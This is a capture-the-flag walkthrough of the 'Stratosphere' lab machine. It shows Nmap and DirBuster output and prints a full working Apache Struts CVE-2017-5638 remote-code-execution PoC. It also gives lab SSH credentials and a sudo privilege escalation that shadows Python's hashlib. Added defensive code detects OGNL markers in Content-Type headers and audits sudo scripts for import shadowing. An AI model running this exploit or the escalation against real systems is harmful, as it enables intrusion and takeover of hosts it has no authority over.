Difficulty Rating:

Machine: Stratosphere
OS: Linux
IP: 10.10.10.64


The machine runs web services on ports 80 and 8080 that are backed by Apache Struts. The Struts version is vulnerable to CVE-2017-5638 (S2-045), which gives Remote Code Execution (RCE) through a crafted Content-Type header. Privilege escalation was done through poorly configured sudo permissions.


  • Nmap
# Nmap 7.70 scan initiated Mon Jun 11 21:29:36 2018 as: nmap -A -oN stratosphere.nmap -v 10.10.10.64
Nmap scan report for 10.10.10.64
Host is up (0.26s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
|   256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
|_  256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1114
|     Date: Mon, 11 Jun 2018 16:00:00 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 404 
|     Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body>
|   GetRequest: 
|     HTTP/1.1 200 
|     Accept-Ranges: bytes
|     ETag: W/"1708-1519762495000"
|     Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
|     Content-Type: text/html
|     Content-Length: 1708
|     Date: Mon, 11 Jun 2018 15:59:58 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta charset="utf-8"/>
|     <title>Stratosphere</title>
|     <link rel="stylesheet" type="text/css" href="main.css">
|     </head>
|     <body>
|     <div id="background"></div>
|     <header id="main-header" class="hidden">
|     <div class="container">
|     <div class="content-wrap">
|     <p><i class="fa fa-diamond"></i></p>
|     <nav>
|     class="btn" href="GettingStarted.html">Get started</a>
|     </nav>
|     </div>
|     </div>
|     </header>
|     <section id="greeting">
|     <div class="container">
|     <div class="content-wrap">
|     <h1>Stratosphere<br>We protect your credit.</h1>
|     class="btn" href="GettingStarted.html">Get started now</a>
|     <p><i class="ar
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
|     Content-Length: 0
|     Date: Mon, 11 Jun 2018 15:59:59 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Transfer-Encoding: chunked
|     Date: Mon, 11 Jun 2018 15:59:59 GMT
|     Connection: close
|   X11Probe: 
|     HTTP/1.1 400 
|     Transfer-Encoding: chunked
|     Date: Mon, 11 Jun 2018 16:00:00 GMT
|_    Connection: close
| http-methods: 
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-title: Stratosphere
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1114
|     Date: Mon, 11 Jun 2018 16:00:02 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 404 
|     Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body>
|   GetRequest: 
|     HTTP/1.1 200 
|     Accept-Ranges: bytes
|     ETag: W/"1708-1519762495000"
|     Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
|     Content-Type: text/html
|     Content-Length: 1708
|     Date: Mon, 11 Jun 2018 15:59:58 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta charset="utf-8"/>
|     <title>Stratosphere</title>
|     <link rel="stylesheet" type="text/css" href="main.css">
|     </head>
|     <body>
|     <div id="background"></div>
|     <header id="main-header" class="hidden">
|     <div class="container">
|     <div class="content-wrap">
|     <p><i class="fa fa-diamond"></i></p>
|     <nav>
|     class="btn" href="GettingStarted.html">Get started</a>
|     </nav>
|     </div>
|     </div>
|     </header>
|     <section id="greeting">
|     <div class="container">
|     <div class="content-wrap">
|     <h1>Stratosphere<br>We protect your credit.</h1>
|     class="btn" href="GettingStarted.html">Get started now</a>
|     <p><i class="ar
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
|     Content-Length: 0
|     Date: Mon, 11 Jun 2018 15:59:59 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Transfer-Encoding: chunked
|     Date: Mon, 11 Jun 2018 15:59:59 GMT
|_    Connection: close
| http-methods: 
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-title: Stratosphere
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.70%I=7%D=6/11%Time=5B1E9C7F%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,786,"HTTP/1\.1\x20200\x20\r\nAccept-Ranges:\x20bytes\r\nETag:\x2
SF:0W/\"1708-1519762495000\"\r\nLast-Modified:\x20Tue,\x2027\x20Feb\x20201
SF:8\x2020:14:55\x20GMT\r\nContent-Type:\x20text/html\r\nContent-Length:\x
SF:201708\r\nDate:\x20Mon,\x2011\x20Jun\x202018\x2015:59:58\x20GMT\r\nConn
SF:ection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\x2
SF:0\x20<meta\x20charset=\"utf-8\"/>\n\x20\x20\x20\x20<title>Stratosphere<
SF:/title>\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20type=\"text/css
SF:\"\x20href=\"main\.css\">\n</head>\n\n<body>\n<div\x20id=\"background\"
SF:></div>\n<header\x20id=\"main-header\"\x20class=\"hidden\">\n\x20\x20<d
SF:iv\x20class=\"container\">\n\x20\x20\x20\x20<div\x20class=\"content-wra
SF:p\">\n\x20\x20\x20\x20\x20\x20<p><i\x20class=\"fa\x20fa-diamond\"></i><
SF:/p>\n\x20\x20\x20\x20\x20\x20<nav>\n\x20\x20\x20\x20\x20\x20\x20\x20<a\
SF:x20class=\"btn\"\x20href=\"GettingStarted\.html\">Get\x20started</a>\n\
SF:x20\x20\x20\x20\x20\x20</nav>\n\x20\x20\x20\x20</div>\n\x20\x20</div>\n
SF:</header>\n\n<section\x20id=\"greeting\">\n\x20\x20<div\x20class=\"cont
SF:ainer\">\n\x20\x20\x20\x20<div\x20class=\"content-wrap\">\n\x20\x20\x20
SF:\x20\x20\x20<h1>Stratosphere<br>We\x20protect\x20your\x20credit\.</h1>\
SF:n\x20\x20\x20\x20\x20\x20<a\x20class=\"btn\"\x20href=\"GettingStarted\.
SF:html\">Get\x20started\x20now</a>\n\x20\x20\x20\x20\x20\x20<p><i\x20clas
SF:s=\"ar")%r(HTTPOptions,8A,"HTTP/1\.1\x20200\x20\r\nAllow:\x20GET,\x20HE
SF:AD,\x20POST,\x20PUT,\x20DELETE,\x20OPTIONS\r\nContent-Length:\x200\r\nD
SF:ate:\x20Mon,\x2011\x20Jun\x202018\x2015:59:59\x20GMT\r\nConnection:\x20
SF:close\r\n\r\n")%r(RTSPRequest,6A,"HTTP/1\.1\x20400\x20\r\nTransfer-Enco
SF:ding:\x20chunked\r\nDate:\x20Mon,\x2011\x20Jun\x202018\x2015:59:59\x20G
SF:MT\r\nConnection:\x20close\r\n\r\n0\r\n\r\n")%r(X11Probe,6A,"HTTP/1\.1\
SF:x20400\x20\r\nTransfer-Encoding:\x20chunked\r\nDate:\x20Mon,\x2011\x20J
SF:un\x202018\x2016:00:00\x20GMT\r\nConnection:\x20close\r\n\r\n0\r\n\r\n"
SF:)%r(FourOhFourRequest,4F6,"HTTP/1\.1\x20404\x20\r\nContent-Type:\x20tex
SF:t/html;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x201
SF:114\r\nDate:\x20Mon,\x2011\x20Jun\x202018\x2016:00:00\x20GMT\r\nConnect
SF:ion:\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><titl
SF:e>HTTP\x20Status\x20404\x20\xe2\x80\x93\x20Not\x20Found</title><style\x
SF:20type=\"text/css\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:wh
SF:ite;background-color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tah
SF:oma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16p
SF:x;}\x20h3\x20{font-family:Tahoma,Arial,sans-serif;color:white;backgroun
SF:d-color:#525D76;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,s
SF:ans-serif;color:black;background-color:white;}\x20b\x20{font-family:Tah
SF:oma,Arial,sans-serif;color:white;background-color:#525D76;}\x20p\x20{fo
SF:nt-family:Tahoma,Arial,sans-serif;background:white;color:black;font-siz
SF:e:12px;}\x20a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\
SF:x20{height:1px;background-color:#525D76;border:none;}</style></head><bo
SF:dy>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8080-TCP:V=7.70%I=7%D=6/11%Time=5B1E9C7F%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,786,"HTTP/1\.1\x20200\x20\r\nAccept-Ranges:\x20bytes\r\nETag:\
SF:x20W/\"1708-1519762495000\"\r\nLast-Modified:\x20Tue,\x2027\x20Feb\x202
SF:018\x2020:14:55\x20GMT\r\nContent-Type:\x20text/html\r\nContent-Length:
SF:\x201708\r\nDate:\x20Mon,\x2011\x20Jun\x202018\x2015:59:58\x20GMT\r\nCo
SF:nnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\
SF:x20\x20<meta\x20charset=\"utf-8\"/>\n\x20\x20\x20\x20<title>Stratospher
SF:e</title>\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20type=\"text/c
SF:ss\"\x20href=\"main\.css\">\n</head>\n\n<body>\n<div\x20id=\"background
SF:\"></div>\n<header\x20id=\"main-header\"\x20class=\"hidden\">\n\x20\x20
SF:<div\x20class=\"container\">\n\x20\x20\x20\x20<div\x20class=\"content-w
SF:rap\">\n\x20\x20\x20\x20\x20\x20<p><i\x20class=\"fa\x20fa-diamond\"></i
SF:></p>\n\x20\x20\x20\x20\x20\x20<nav>\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:a\x20class=\"btn\"\x20href=\"GettingStarted\.html\">Get\x20started</a>\
SF:n\x20\x20\x20\x20\x20\x20</nav>\n\x20\x20\x20\x20</div>\n\x20\x20</div>
SF:\n</header>\n\n<section\x20id=\"greeting\">\n\x20\x20<div\x20class=\"co
SF:ntainer\">\n\x20\x20\x20\x20<div\x20class=\"content-wrap\">\n\x20\x20\x
SF:20\x20\x20\x20<h1>Stratosphere<br>We\x20protect\x20your\x20credit\.</h1
SF:>\n\x20\x20\x20\x20\x20\x20<a\x20class=\"btn\"\x20href=\"GettingStarted
SF:\.html\">Get\x20started\x20now</a>\n\x20\x20\x20\x20\x20\x20<p><i\x20cl
SF:ass=\"ar")%r(HTTPOptions,8A,"HTTP/1\.1\x20200\x20\r\nAllow:\x20GET,\x20
SF:HEAD,\x20POST,\x20PUT,\x20DELETE,\x20OPTIONS\r\nContent-Length:\x200\r\
SF:nDate:\x20Mon,\x2011\x20Jun\x202018\x2015:59:59\x20GMT\r\nConnection:\x
SF:20close\r\n\r\n")%r(RTSPRequest,6A,"HTTP/1\.1\x20400\x20\r\nTransfer-En
SF:coding:\x20chunked\r\nDate:\x20Mon,\x2011\x20Jun\x202018\x2015:59:59\x2
SF:0GMT\r\nConnection:\x20close\r\n\r\n0\r\n\r\n")%r(FourOhFourRequest,4F6
SF:,"HTTP/1\.1\x20404\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nC
SF:ontent-Language:\x20en\r\nContent-Length:\x201114\r\nDate:\x20Mon,\x201
SF:1\x20Jun\x202018\x2016:00:02\x20GMT\r\nConnection:\x20close\r\n\r\n<!do
SF:ctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Status\x20404\x
SF:20\xe2\x80\x93\x20Not\x20Found</title><style\x20type=\"text/css\">h1\x2
SF:0{font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525
SF:D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-serif;colo
SF:r:white;background-color:#525D76;font-size:16px;}\x20h3\x20{font-family
SF::Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size
SF::14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;color:black;bac
SF:kground-color:white;}\x20b\x20{font-family:Tahoma,Arial,sans-serif;colo
SF:r:white;background-color:#525D76;}\x20p\x20{font-family:Tahoma,Arial,sa
SF:ns-serif;background:white;color:black;font-size:12px;}\x20a\x20{color:b
SF:lack;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:1px;background
SF:-color:#525D76;border:none;}</style></head><body>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 11 21:30:31 2018 -- 1 IP address (1 host up) scanned in 54.86 seconds

  • Port 80 and 8080 are web services.

  • Dirbuster

DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Mon Jun 11 22:21:34 IST 2018
--------------------------------

http://10.10.10.64:8080
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/
/Monitoring/

Dirs found with a 302 response:

/manager/


--------------------------------
Files found during testing:

Files found with a 200 responce:

/GettingStarted.html
/main.js


--------------------------------

  • /Monitoring/ redirects to Welcome.action
  • The .action extension indicates it is running Apache Struts.
  • Let’s try the exploit for CVE-2017-5638
  • The code below is the public PoC for the CVE:
#!/usr/bin/python
# -*- coding: utf-8 -*-

import urllib2
import httplib


def exploit(url, cmd):
    payload = "%{(#_='multipart/form-data')."
    payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@[email protected]))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd='%s')." % cmd
    payload += "(#iswin=(@[email protected]('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@[email protected]().getOutputStream()))."
    payload += "(@[email protected](#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"

    try:
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        request = urllib2.Request(url, headers=headers)
        page = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        page = e.partial

    print(page)
    return page


if __name__ == '__main__':
    import sys
    if len(sys.argv) != 3:
        print("[*] struts2_S2-045.py <url> <cmd>")
    else:
        print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
        url = sys.argv[1]
        cmd = sys.argv[2]
        print("[*] cmd: %s\n" % cmd)
        exploit(url, cmd)
  • Use this code to get Remote Code Execution (RCE)
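The PoC above works because Struts' multipart handler evaluates the Content-Type header value as an OGNL expression; a patched server (Struts 2.3.32 / 2.5.10.1 or later) does not. From the defender's side the same property makes the attack easy to spot at a reverse proxy or in request logs: a legitimate Content-Type is a plain media type, never something beginning with "%{". The following detection routine is an added example written for this page, not code from the original writeup. The sample requests are constructed; the marker strings are taken from the PoC shown above.

```python
import re

# Constructed sample requests (not from the page): method, path and the raw
# Content-Type header value as a reverse proxy or WAF would see it.
SAMPLE_REQUESTS = [
    ("POST", "/Monitoring/example/Welcome.action",
     "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"),
    ("GET", "/Monitoring/example/Welcome.action",
     "%{(#_='multipart/form-data').(#cmd='id')}"),
    ("POST", "/Monitoring/example/Welcome.action",
     "application/x-www-form-urlencoded"),
    ("GET", "/GettingStarted.html", ""),
]

# A syntactically valid media type: type/subtype followed by optional ;parameters.
MEDIA_TYPE = re.compile(r"^[A-Za-z0-9!#$&^_.+-]+/[A-Za-z0-9!#$&^_.+-]+(\s*;.*)?$")

# Fragments that only appear when an OGNL expression is smuggled into the header;
# every one of them occurs in the S2-045 PoC shown on this page.
OGNL_MARKERS = ("%{", "${", "#_memberAccess", "DEFAULT_MEMBER_ACCESS",
                "#cmd=", "ProcessBuilder")


def content_type_verdict(value):
    """Return None for a benign Content-Type, otherwise a short reason string."""
    if value == "":
        return None                      # header absent: nothing for Struts to parse
    hits = [m for m in OGNL_MARKERS if m in value]
    if hits:
        return "OGNL marker(s) in Content-Type: " + ", ".join(hits)
    if not MEDIA_TYPE.match(value):
        return "Content-Type is not a well-formed media type"
    return None


def flag_requests(requests):
    """Return [(index, method, path, reason)] for each request that looks like an S2-045 attempt."""
    flagged = []
    for i, (method, path, ctype) in enumerate(requests):
        reason = content_type_verdict(ctype)
        if reason:
            flagged.append((i, method, path, reason))
    return flagged


if __name__ == "__main__":
    for entry in flag_requests(SAMPLE_REQUESTS):
        print("ALERT request #%d %s %s -> %s" % entry)
```

The well-formedness check catches variants that avoid the obvious markers, because a header that is not "type/subtype" has no legitimate reason to exist; the marker list gives a readable reason for the alert. Either hit on a Struts endpoint is worth an immediate look at that host, since a single request is enough for code execution.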


  • Check the file db_connect. It has some credentials.

  • We can use them to connect to MySQL. Since we only have a non-interactive shell, we need to query MySQL non-interactively; the -e flag runs a statement and exits.

  • Let’s try to retrieve some passwords from it.

  • SSH into the machine using following credentials.
SSH Creds
richard:9tc*rhKuG5TyXvUJOrE^5CK7k

  • Get user.txt

  • In the home directory, we find test.py

  • Check sudo permissions

  • We can execute test.py with sudo permissions.

  • We see that it uses import hashlib. Python puts the script's own directory first on sys.path, so a file named hashlib.py placed in the same directory as test.py is imported instead of the standard-library module. To exploit that, create our own hashlib.py containing Python code that spawns a shell, in the same directory as test.py.

  • Create a file hashlib.py with the following payload

  • Execute test.py with sudo command

  • Get root.txt
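The root step above is a module-shadowing problem, not a bug in test.py: sudo lets a user run a script as root from a directory that user can write to, and Python resolves imports against that directory first. The audit below is an added example for this page, not code from the writeup or from the box. It reproduces the scenario in a temporary directory (constructed, writable by everyone), lists the script's imports, checks who owns the directory and whether others can write to it, and reports any file that already shadows an import.

```python
import ast
import os
import shutil
import stat
import tempfile


def top_level_imports(source):
    """Module names a script imports; each one could be replaced by a planted <name>.py."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                names.add(alias.name.split(".")[0])
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def audit_sudo_script(script_path):
    """Audit a script that a sudo rule allows to run as root.

    Python inserts the script's directory at sys.path[0], so any <module>.py
    placed there wins over the standard library. Report the imports, whether
    the directory is root-owned and unwritable by others, and any file that
    already shadows one of the imports."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    with open(script_path) as f:
        imports = top_level_imports(f.read())
    st = os.stat(script_dir)
    dir_writable_by_others = bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))
    shadowed = [m for m in imports
                if os.path.exists(os.path.join(script_dir, m + ".py"))
                or os.path.isdir(os.path.join(script_dir, m))]
    unsafe = st.st_uid != 0 or dir_writable_by_others or bool(shadowed)
    return {
        "script_dir": script_dir,
        "imports": imports,
        "dir_owner_uid": st.st_uid,
        "dir_writable_by_others": dir_writable_by_others,
        "shadowed": shadowed,
        "unsafe": unsafe,
    }


def demo():
    """Rebuild the page's scenario in a constructed temp dir: test.py importing
    hashlib, then a hashlib.py dropped beside it. Returns (before, after) audits."""
    d = tempfile.mkdtemp()
    os.chmod(d, 0o777)  # constructed: a directory anyone can write to
    script = os.path.join(d, "test.py")
    with open(script, "w") as f:
        f.write("import hashlib\nprint(hashlib.md5(b'x').hexdigest())\n")
    before = audit_sudo_script(script)
    with open(os.path.join(d, "hashlib.py"), "w") as f:
        f.write("# stand-in for a planted module; a real one would run as root\n")
    after = audit_sudo_script(script)
    shutil.rmtree(d)
    return before, after


if __name__ == "__main__":
    for label, report in zip(("before", "after"), demo()):
        print(label, report)
```

A sudo rule for a Python script is only safe when the script and its directory are root-owned and not writable by the invoking user; the audit marks anything else unsafe even before a shadowing file appears. A further hardening that does not depend on directory permissions is to write the rule as `/usr/bin/python3 -I /path/to/test.py`, since isolated mode drops the script directory from sys.path and ignores PYTHONPATH.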
User and root owned!!

Share the fun!